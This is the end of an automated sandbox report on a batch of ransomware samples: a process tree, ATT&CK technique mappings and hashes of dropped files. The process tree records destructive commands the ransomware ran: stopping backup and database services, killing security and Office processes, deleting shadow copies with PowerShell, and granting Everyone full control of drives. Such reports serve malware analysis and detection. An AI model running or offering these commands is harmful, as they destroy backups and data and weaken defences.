        PID:14792
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop WRSVC /y
      4⤵
      PID:6568
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop WRSVC /y
        5⤵
        
        PID:15660
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop mssql$vim_sqlexp /y
      4⤵
      PID:6576
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
        5⤵
        
        PID:16016
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop vapiendpoint /y
      4⤵
      PID:6584
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop vapiendpoint /y
        5⤵
        
        PID:15740
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop ReportServer$SQL_2008 /y
      4⤵
      PID:6684
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
        5⤵
        
        PID:16496
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop BackupExecJobEngine /y
      4⤵
      PID:6700
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop BackupExecJobEngine /y
        5⤵
        
        PID:16680
  - - C:\Windows\SysWOW64\sc.exe
      "sc.exe" config SQLTELEMETRY start= disabled
      4⤵
      Launches sc.exe
      PID:6804
  - - C:\Windows\SysWOW64\sc.exe
      "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
      4⤵
      Launches sc.exe
      PID:6812
  - - C:\Windows\SysWOW64\sc.exe
      "sc.exe" config SQLWriter start= disabled
      4⤵
      Launches sc.exe
      PID:6820
  - - C:\Windows\SysWOW64\sc.exe
      "sc.exe" config SstpSvc start= disabled
      4⤵
      Launches sc.exe
      PID:6828
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM mspub.exe /F
      4⤵
      Kills process with taskkill
      PID:6836
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM mydesktopqos.exe /F
      4⤵
      Kills process with taskkill
      PID:6844
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM mydesktopservice.exe /F
      4⤵
      Kills process with taskkill
      PID:6852
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM mysqld.exe /F
      4⤵
      Kills process with taskkill
      PID:6860
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM sqbcoreservice.exe /F
      4⤵
      Kills process with taskkill
      PID:6868
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM firefoxconfig.exe /F
      4⤵
      Kills process with taskkill
      PID:6876
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM agntsvc.exe /F
      4⤵
      Kills process with taskkill
      PID:6884
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM thebat.exe /F
      4⤵
      Kills process with taskkill
      PID:6892
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM steam.exe /F
      4⤵
      Kills process with taskkill
      PID:6900
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM encsvc.exe /F
      4⤵
      Kills process with taskkill
      PID:6908
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM excel.exe /F
      4⤵
      Kills process with taskkill
      PID:6916
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM CNTAoSMgr.exe /F
      4⤵
      Kills process with taskkill
      PID:6924
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM sqlwriter.exe /F
      4⤵
      Kills process with taskkill
      PID:6936
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM tbirdconfig.exe /F
      4⤵
      Kills process with taskkill
      PID:6944
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM dbeng50.exe /F
      4⤵
      Kills process with taskkill
      PID:6956
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM thebat64.exe /F
      4⤵
      Kills process with taskkill
      PID:6964
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM ocomm.exe /F
      4⤵
      Kills process with taskkill
      PID:6972
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM infopath.exe /F
      4⤵
      Kills process with taskkill
      PID:6980
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM mbamtray.exe /F
      4⤵
      Kills process with taskkill
      PID:6988
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM zoolz.exe /F
      4⤵
      Kills process with taskkill
      PID:6996
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" IM thunderbird.exe /F
      4⤵
      Kills process with taskkill
      PID:7004
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM dbsnmp.exe /F
      4⤵
      Kills process with taskkill
      PID:7012
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM xfssvccon.exe /F
      4⤵
      Kills process with taskkill
      PID:7020
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM mspub.exe /F
      4⤵
      Kills process with taskkill
      PID:7028
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM Ntrtscan.exe /F
      4⤵
      Kills process with taskkill
      PID:7036
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM isqlplussvc.exe /F
      4⤵
      Kills process with taskkill
      PID:7048
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM onenote.exe /F
      4⤵
      Kills process with taskkill
      PID:7056
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM PccNTMon.exe /F
      4⤵
      Kills process with taskkill
      PID:7068
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM msaccess.exe /F
      4⤵
      Kills process with taskkill
      PID:7076
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM outlook.exe /F
      4⤵
      Kills process with taskkill
      PID:7084
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM tmlisten.exe /F
      4⤵
      Kills process with taskkill
      PID:7092
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM msftesql.exe /F
      4⤵
      Kills process with taskkill
      PID:7100
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM powerpnt.exe /F
      4⤵
      Kills process with taskkill
      PID:7108
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM mydesktopqos.exe /F
      4⤵
      Kills process with taskkill
      PID:7116
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM visio.exe /F
      4⤵
      Kills process with taskkill
      PID:7124
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM mydesktopservice.exe /F
      4⤵
      Kills process with taskkill
      PID:7132
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM winword.exe /F
      4⤵
      Kills process with taskkill
      PID:7144
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM mysqld-nt.exe /F
      4⤵
      Kills process with taskkill
      PID:7152
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM wordpad.exe /F
      4⤵
      Kills process with taskkill
      PID:7164
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM mysqld-opt.exe /F
      4⤵
      Kills process with taskkill
      PID:5160
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM ocautoupds.exe /F
      4⤵
      Kills process with taskkill
      PID:544
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM ocssd.exe /F
      4⤵
      Kills process with taskkill
      PID:1496
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM oracle.exe /F
      4⤵
      Kills process with taskkill
      PID:7176
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM sqlagent.exe /F
      4⤵
      Kills process with taskkill
      PID:7184
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM sqlbrowser.exe /F
      4⤵
      Kills process with taskkill
      PID:7192
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM sqlservr.exe /F
      4⤵
      Kills process with taskkill
      PID:7200
  - - C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM synctime.exe /F
      4⤵
      Kills process with taskkill
      PID:7208
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
      4⤵
      PID:7216
  - - C:\Windows\SysWOW64\icacls.exe
      "icacls" "C:*" /grant Everyone:F /T /C /Q
      4⤵
      Modifies file permissions
      PID:7252
  - - C:\Windows\SysWOW64\icacls.exe
      "icacls" "D:*" /grant Everyone:F /T /C /Q
      4⤵
      Modifies file permissions
      PID:7260
  - - C:\Windows\SysWOW64\icacls.exe
      "icacls" "Z:*" /grant Everyone:F /T /C /Q
      4⤵
      Modifies file permissions
      PID:7268
- - C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.Win32.Agent.gen-7985a06e0d0741623d33531ed7f20a60eb47efba0d04ea1232d132ae6fc902cf.exe
    HEUR-Trojan-Ransom.Win32.Agent.gen-7985a06e0d0741623d33531ed7f20a60eb47efba0d04ea1232d132ae6fc902cf.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3952
  - - C:\Users\Admin\AppData\Local\Temp\NOD65.exe
      "C:\Users\Admin\AppData\Local\Temp\NOD65.exe"
      4⤵
      PID:13476
  - - C:\Windows\SysWOW64\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\ключи.txt
      4⤵
      PID:19320
- - C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.Win32.Avaddon.gen-e53b7f74cba1228b9f406c04e0ec580f4597d6de93cb5cdbf51564fee4111ead.exe
    HEUR-Trojan-Ransom.Win32.Avaddon.gen-e53b7f74cba1228b9f406c04e0ec580f4597d6de93cb5cdbf51564fee4111ead.exe
    3⤵
    PID:16856
- - C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.Win32.Blocker.gen-218e1a2d72b5baa1681b8d67abcbc8f8ab0681c6ff6d6d03283328458aadeb59.exe
    HEUR-Trojan-Ransom.Win32.Blocker.gen-218e1a2d72b5baa1681b8d67abcbc8f8ab0681c6ff6d6d03283328458aadeb59.exe
    3⤵
    PID:19416

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3fb8055 /state1:0x41c64e6d
1⤵
PID:18604

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

File and Directory Permissions Modification

T1222

Credential Access

Discovery

Network Share Discovery

T1135

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Dhonvdh\ithmrdrvas.exe

Filesize
9.3MB

MD5
8930f5a56afe4a9f02c01c6c6b647da0

SHA1
b1000f35e9150d59b0849a662d35f69e67294a51

SHA256
09aaf5e962480a6412c5523f6705489e5aee2f2bd3e42491074b903d0f5d3d3d

SHA512
05ed5347ffd7bfd1692d7f61f1a051d9377710abdd366ef05ca399566d01cb3bb4065a0693f85ca1e5455452ce3cda2a795f73f259ba3158492f2fb62165b1dc

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

Filesize
64KB

MD5
d2fb266b97caff2086bf0fa74eddb6b2

SHA1
2f0061ce9c51b5b4fbab76b37fc6a540be7f805d

SHA256
b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a

SHA512
c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

Filesize
944B

MD5
6bd369f7c74a28194c991ed1404da30f

SHA1
0f8e3f8ab822c9374409fe399b6bfe5d68cbd643

SHA256
878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d

SHA512
8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93

Download Submit
C:\Users\Admin\AppData\Local\Temp\6df8434e-2f81-49d0-9f91-fa476d8451ff\AgileDotNetRT64.dll

Filesize
1.4MB

MD5
00a0c71dbc43efc7e53eea7243c35538

SHA1
57144dff50f3320eee576810f8770f7dce7ec124

SHA256
ce59eb41a1f5aee393065fecae450e878a4bb83b5662edebfd524a852f0ac515

SHA512
dadfac7fe9ec775ae9773c5e3f5b90af3070709f23b1458e549e21f058688dca4e4d1c3714c9f248031a3aedaff3b50a4d1c592a793640878890b901ce019f34

Download Submit
C:\Users\Admin\AppData\Local\Temp\HOW_TO_DECYPHER_FILES.txt

Filesize
462B

MD5
40efb51797eba37ca8fc4134750ba797

SHA1
669c3ef5dd9eaf0e5343d4a4a2899bd9c1e3f4de

SHA256
88ae09c6a9342b3ac736c3c371201c48f1847988343544f4fcf8bc878eb0f18c

SHA512
d3315b123faadbaa0df3d947a1f2159a723dc4fc78500a824a57455fa01e184b25863788ac6fe8a25987b443f184e202f81dfe2f017d64629e10e350674fd0cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\NOD65.exe

Filesize
3.4MB

MD5
5b1bfbdb1c35544328b3246a64043822

SHA1
e6e16ece2b3dc7ce45acab9b7968130755df929a

SHA256
8bafbed0b032896bb033f37d40d5a5263a542e65be6f0d2ac64ed7736c48dba8

SHA512
84c68bb64a2aa36cc51eb643737d6f72233c7de276bc7a344b73d9b5f93aa5e552a276f80d3d7a551d65ea3711881f7709e14b663f4e27f521ec385408afcc28

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b4j52zin.gni.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ключи.txt

Filesize
264B

MD5
ea4b8a77e7fcc144a99f0df1ed80ef28

SHA1
528100a050eaf48719052ec8e192bf4753ba00a0

SHA256
d0fff7c7c5abcbb31c6db6d1c225c8c48de81abcee4fbc6d3256f0ec5eabfaa0

SHA512
77648fce6db8d4d5247581e40e5af919919e33663c504a675c5719228b61a3f1abef2a3693b6310bb4b065949a37d2f261e77432c4788e0ee6e49be7681fea1f

Download Submit
C:\Users\Admin\AppData\Roaming\Dhonvdh\ithmrdrvas

Filesize
23KB

MD5
36e46c94200c5a402ad5ee9ca1297b40

SHA1
e3836d2ded612d83a6703e8acb022126b6673961

SHA256
6cbcc96bad856dd4c93143fcf373c168658f220e0f4b7c09fda0a24483d14041

SHA512
3a67c7d46dcace2b2af400ba9d233a7b9b8787e7a10b940de5e2db75d4036836e61c8cce197f2332dfc2422a7177987a88be186c8e6224962bf17efa4094bcde

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk

Filesize
1006B

MD5
78ec8ad9d6d242ba4494c15920da7dc6

SHA1
b75a5c1c62a07c0319dc138377a74a81ac1760c8

SHA256
592ebc9728896179f4e39adb859252b476b580c72d7b1b8e61849ef93538666d

SHA512
2d9334df97cdefdc9168e4697d73627ca8e2e4e4ae3e9439502f04ff9af11ade512e01e10c504e2aa882312fda9cc4829d3b6b54df98e85ec557053b657cca58

Download Submit
C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.MSIL.Blocker.gen-5bc1aa76792901dce26683075941887a08bd4bafae6ad99edae15368aff2b598.exe

Filesize
3.9MB

MD5
2541462396902d3695028ac39cbc0e19

SHA1
f587ed6eba930ca7d6717382010245c0b6abf1dd

SHA256
5bc1aa76792901dce26683075941887a08bd4bafae6ad99edae15368aff2b598

SHA512
27b93878683e7af48042cb7c97b415b2d966d41afc74b9cd081cac65df9ae8d71047e44b750cffd253c878c3f61b55e6aa076a245a8c1f2868cfbe32bacad034

Download Submit
C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.MSIL.Encoder.gen-39d4d4591d7dc4242d23460417568b7da1b6efd62e9dcd3b409a3922dad37b78.exe

Filesize
5.3MB

MD5
85fb5ada4ea66aeeb5b06c1506fa2bea

SHA1
925346953ab964c76d1fc322243d30b92547052d

SHA256
39d4d4591d7dc4242d23460417568b7da1b6efd62e9dcd3b409a3922dad37b78

SHA512
e607b2a41ea4207dec027eff54c151fe47e6d501705ec6e5e51eea56718285a8fa73608d27bba0157abbbc09f1a0f58b1045b4c748ba213857e83a183a3cbd01

Download Submit
C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.MSIL.Foreign.gen-4075ae09b2cad5580286fb104acdbc0bfff1168e1f49057049807af7ec11957e.exe

Filesize
59KB

MD5
04f60dd495708663a410f38db90a5592

SHA1
b2a517f140c0064dd7384c0aeee0c0471bcad126

SHA256
4075ae09b2cad5580286fb104acdbc0bfff1168e1f49057049807af7ec11957e

SHA512
5058fed79826dc45acd7f77cfd3c080dbd708ddcda565c41d8c9e38bcd5aca9551b426abfe6033301833dd7f98783ff0d8da14b514e820de780295758376ecdc

Download Submit
C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe

Filesize
80KB

MD5
768d9d9de52fe81defc6067168024547

SHA1
52a55e7edc842b4c8a19ee0342d0f9c21283fabe

SHA256
2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7

SHA512
7d823035d841291d54fd167e4bbd9b404bdbf1baebc42427b41afb788a179eaf66eac9201d5b5dfd0ff61f32b9dbf11e7926e2cf41a1101e9818415fef43dd42

Download Submit
C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.Win32.Agent.gen-7985a06e0d0741623d33531ed7f20a60eb47efba0d04ea1232d132ae6fc902cf.exe

Filesize
1.2MB

MD5
091ae195e390886f0959f6837676d7c6

SHA1
5815f32665b28ab11e3447e2e5053dfea298af18

SHA256
7985a06e0d0741623d33531ed7f20a60eb47efba0d04ea1232d132ae6fc902cf

SHA512
9e5c2d8c58ade4039102e8a49d1c463f10867da2686798293fc1c3ed4ee57c2f526d77890eb674b989d8b48b93fe0a3e88a2071c6580ed30c492bb0bbcf09e90

Download Submit
C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.Win32.Avaddon.gen-e53b7f74cba1228b9f406c04e0ec580f4597d6de93cb5cdbf51564fee4111ead.exe

Filesize
74KB

MD5
5790ee7642277ac3ab4df17ba016754d

SHA1
f1d92a433e7fe4e17c349ebabad629e4fb814af3

SHA256
e53b7f74cba1228b9f406c04e0ec580f4597d6de93cb5cdbf51564fee4111ead

SHA512
e652a3b02827ee7afb794f596d756ff0845c7e67cbef674991a5f3d9ea4bd672bf0d0d12a00df3c6b894eebb3421e1ea8f69c497af2d416bfed8ef0ccd8cb385

Download Submit
C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.Win32.Blocker.gen-218e1a2d72b5baa1681b8d67abcbc8f8ab0681c6ff6d6d03283328458aadeb59.exe

Filesize
1.1MB

MD5
f250bca9f7df36b2140ca5c716936494

SHA1
e2836378b589782b24a25cad64a7b71941b7e89c

SHA256
218e1a2d72b5baa1681b8d67abcbc8f8ab0681c6ff6d6d03283328458aadeb59

SHA512
09ed5e7767b69d52587ad463f59a9b68de52fa0133433716b3adcce2e25650ef899dbfb70958373c7cd4164fc44bbfcb36b7be960fe2b091841dc6ffc965ddc5

Download Submit
C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.Win32.Convagent.gen-ba357fcd997b8634d3f3b2911571fd5b28ef28918e5a886be50cdcb83f1e99cc.exe

Filesize
3.8MB

MD5
05d0ac40e94d0221a3118bfcd45f381f

SHA1
55c6c2ec87cf701f0a59d504e6ac46c8c2e1e219

SHA256
ba357fcd997b8634d3f3b2911571fd5b28ef28918e5a886be50cdcb83f1e99cc

SHA512
e41eeb104a61232a5a1c8fefee29656a31766759db57e6a80b32e2d659eba6c7f266919911906de0c7b3bf3b24bfb1fdf60c447556d1ac56dbe19bb7995a4cab

Download Submit
C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.Win32.Crypren.gen-e8e9f09ff9316c9362d40c9d203541b3f303d7ca351f11f0217ff0c814e810e8.exe

Filesize
220KB

MD5
1eadf4aa41017fa95dcc39183bc48f5d

SHA1
2020a16e5d2f4696b61f96b173b6af8722b81268

SHA256
e8e9f09ff9316c9362d40c9d203541b3f303d7ca351f11f0217ff0c814e810e8

SHA512
555706f76cbe7415213f967ca5922025409d758ac1de77bbc8fda8099117eecf3804026d84ee3b13319bb09edb32e8194dee46ffd9705e1250f78728b909733d

Download Submit
C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.Win32.Encoder.gen-eb02bdfba5086198839622607bcafc345561dc32357c5f2d06c8868fb8c87af5.exe

Filesize
2.8MB

MD5
97da73d15ab5132e5326f32d032cfc49

SHA1
b7852e8f6730920db818f9c7cceae25e4bcc1370

SHA256
eb02bdfba5086198839622607bcafc345561dc32357c5f2d06c8868fb8c87af5

SHA512
f7569e455e49ae446ca4100c6500a474188afb8a82c44fe218c06dcc5d06278673f3263fe8a6a3d019744696c2223e945559d8efc64462f527353ef4c807691d

Download Submit
C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.Win32.Foreign.gen-278655e25418c6db554c6d3cbcf3f16738690e57a276a07ffbe8e6c45e1a21b9.exe

Filesize
448KB

MD5
974dda1be6d85ff82ea15173247114ef

SHA1
c9d9c6d60df64a0131d459f7694999c13465b142

SHA256
278655e25418c6db554c6d3cbcf3f16738690e57a276a07ffbe8e6c45e1a21b9

SHA512
d9a7e9f8e5c14ab4de7dc9b90256a5e7e8472d3d143da72f5466d8fa210264383ff7e147fa076b16ac044b2bb7ce688fb7da072edb3eab0aa9355f69d21e1073

Download Submit
C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.Win32.Spora.gen-b665faa659b655f16f4625fcada4b07288836ac80f91ac7eb88bf16b5a20c1b3.exe

Filesize
1013KB

MD5
855cbd83cc28296b059f2173ef3e512f

SHA1
2b4cf59c57095278001e307571cb077b530a10fa

SHA256
b665faa659b655f16f4625fcada4b07288836ac80f91ac7eb88bf16b5a20c1b3

SHA512
a650b03356eadf6c25c5b4e72c2bf31f81170e4b1fd4c65d39fac3ce335d65f475294a26820535976365a99e46e0a73f73c7f2e90118a401315de6be7c0acacc

Download Submit
C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.Win32.Zerber.pef-a44a932f0ae375fab03a7098806bec205b2692bd50fdb533c39c0eb94797feae.exe

Filesize
240KB

MD5
885d65249f0289d8b7c88ff90907d94a

SHA1
153c9c416ff2b8edc88b67cedede0ed4b13d2c6d

SHA256
a44a932f0ae375fab03a7098806bec205b2692bd50fdb533c39c0eb94797feae

SHA512
f883760537eceb32595ee52eb1268efe22d86ed99c4f6489be191a153dcebd60f239488ff68eb41aee1b6541a8570a424be93c9da05b22385d5059fe2776215d

Download Submit
C:\Users\Admin\Desktop\00398\Trojan-Ransom.Win32.Blocker.mrdd-ef1353cdb8be0bcb093014accdddf56281c05fb89e1fcc4a527907ae5b4bdfa6.exe

Filesize
3.4MB

MD5
bdaf3c0ec05b59de57825149feca706e

SHA1
2a8f421d992133ef36acb0e5fe475531277a44d0

SHA256
ef1353cdb8be0bcb093014accdddf56281c05fb89e1fcc4a527907ae5b4bdfa6

SHA512
a98686a5bed224ea4123796306bb52ff594b9174f99b752e03d1dd6020a10ecbac2def928b215990897f30b4aa4fb57a1909d80fe70fcb9deb2132d79aabee9a

Download Submit
C:\Users\Admin\Desktop\00398\Trojan-Ransom.Win32.Crusis.to-55f111fa13c58f4e6eb6f9828621a463944b7de26fa09cff5a38c31f457def7d.exe

Filesize
92KB

MD5
050f90d26e4490b3930d4ca9ac45d26b

SHA1
612d6d7a40229e45152dbd8a3563b2b28c809565

SHA256
55f111fa13c58f4e6eb6f9828621a463944b7de26fa09cff5a38c31f457def7d

SHA512
6d5f41e812a35b050e571530668cdf89b22390d6cda58c0511c754ee7ec56b2f7e0c683f946a8dc67265c0d14823d39a1a9057b310556b51290e36ccd3e429c7

Download Submit
C:\Users\Admin\Desktop\00398\Trojan-Ransom.Win32.Crypmod.abtq-fd1096cb5bedfa8eb0bc020ec86133c26e2f3476d7d90ad4ff768352ce5c1e64.exe

Filesize
148KB

MD5
fffbf924a7f6e803a6427c4ba565e49d

SHA1
2768a5eea5f50cb0d91aeb1270acd6bfca54f270

SHA256
fd1096cb5bedfa8eb0bc020ec86133c26e2f3476d7d90ad4ff768352ce5c1e64

SHA512
b2fb7891328a1cb95e4128655c3ab439b2115f7f2af292d99aa0796a08189c90df4d5c792fdd62b94e39e5615632e421f02590224777230d1c8fa362255251a0

Download Submit
C:\Users\Admin\Desktop\00398\Trojan-Ransom.Win32.Cryptodef.agcb-4ceda276c1fd39149c23c16990e1aaf3d4e109993d6404f247f0b4919bb39cc0.exe

Filesize
5.5MB

MD5
687dd7f9554ccf5e39cfa1fcbd950b0c

SHA1
3dbc4a64b2de460536f686e5f2d47ae07fa6cd07

SHA256
4ceda276c1fd39149c23c16990e1aaf3d4e109993d6404f247f0b4919bb39cc0

SHA512
2df2ca3fb48a1ddddb9a0ebeae678c22a14eba6ac7bbf4b1401bd260b92df5da39af42f843fd4a6ab313e8b9dcf6a8dea556ba6a88413f6f5124a7f98fc97645

Download Submit
C:\Users\Admin\Desktop\00398\Trojan-Ransom.Win32.Cryptor.drw-7d3d67502966a38a02213eab1daa3e099bb44cdc5aa0875ab6db55b1a65d294e.exe

Filesize
293KB

MD5
dbdbdceeaaef63610cac5203b16efd21

SHA1
9c3da1fec2d45bd93a90c155438fe82887ddb665

SHA256
7d3d67502966a38a02213eab1daa3e099bb44cdc5aa0875ab6db55b1a65d294e

SHA512
5d88fd9c51e238ee53011c9388812643baac38d651aff3853aa60798b9a70709f0fb46799a9b9409e2611aa70609c63a0f17128bd37cadd6c34846fd65444a92

Download Submit
C:\Users\Admin\Desktop\00398\Trojan-Ransom.Win32.Gen.web-7f05bf6fd7f5c5bfe0c201d73029439b228bc4d729306f7cea8077f03292fe63.exe

Filesize
2.9MB

MD5
fdc4436fa5700e2ff984d25dfcb19a72

SHA1
d6503f42be986ef42fe20c39309111bad7602403

SHA256
7f05bf6fd7f5c5bfe0c201d73029439b228bc4d729306f7cea8077f03292fe63

SHA512
a21a29ae37488ceb331405c1f53fa8e795dc1744561fa57352c1dadbc82e01e0bdd2f3b5c03a1dcf3f0d7dfb71670cf0be88d702b8757c3b83ba592212d59cc1

Download Submit
C:\Users\Admin\Desktop\00398\Trojan-Ransom.Win32.GenericCryptor.iyf-721b2b38e67387f73ebad1c347c8190d222034cbf6527bcfe9053dde8fcdd3cc.exe

Filesize
263KB

MD5
dcadc504c887859715283b1ae4077d5e

SHA1
254501db0bc3fb4a19ca95260f5b952d7281a459

SHA256
721b2b38e67387f73ebad1c347c8190d222034cbf6527bcfe9053dde8fcdd3cc

SHA512
1d0287d5135d98cfd4e26d2c37507a9721eb09f0db3335fba122f3784024b62982e65a61acf5ee7fe7a02a97e7bad2e9a7addd70856cd86912ba23d61a83a768

Download Submit
C:\Users\Admin\Desktop\00398\Trojan-Ransom.Win32.Petr.aqv-78972cdde1a038f249b481ea2c4b172cc258aa294440333e9c46dcb3fbed5815.exe

Filesize
71KB

MD5
e9fdc21bd273444925a4512166188e5b

SHA1
e398138686eedcd8ef9de5342025f7118e120cdf

SHA256
78972cdde1a038f249b481ea2c4b172cc258aa294440333e9c46dcb3fbed5815

SHA512
64989534f56fcd70f3ff08bb47a331d5624fc1e3b387420a885d6f32a537e05182de8c5890612cde03fdd312ad101955674d7455c84b900bf7eed97b402a2b08

Download Submit
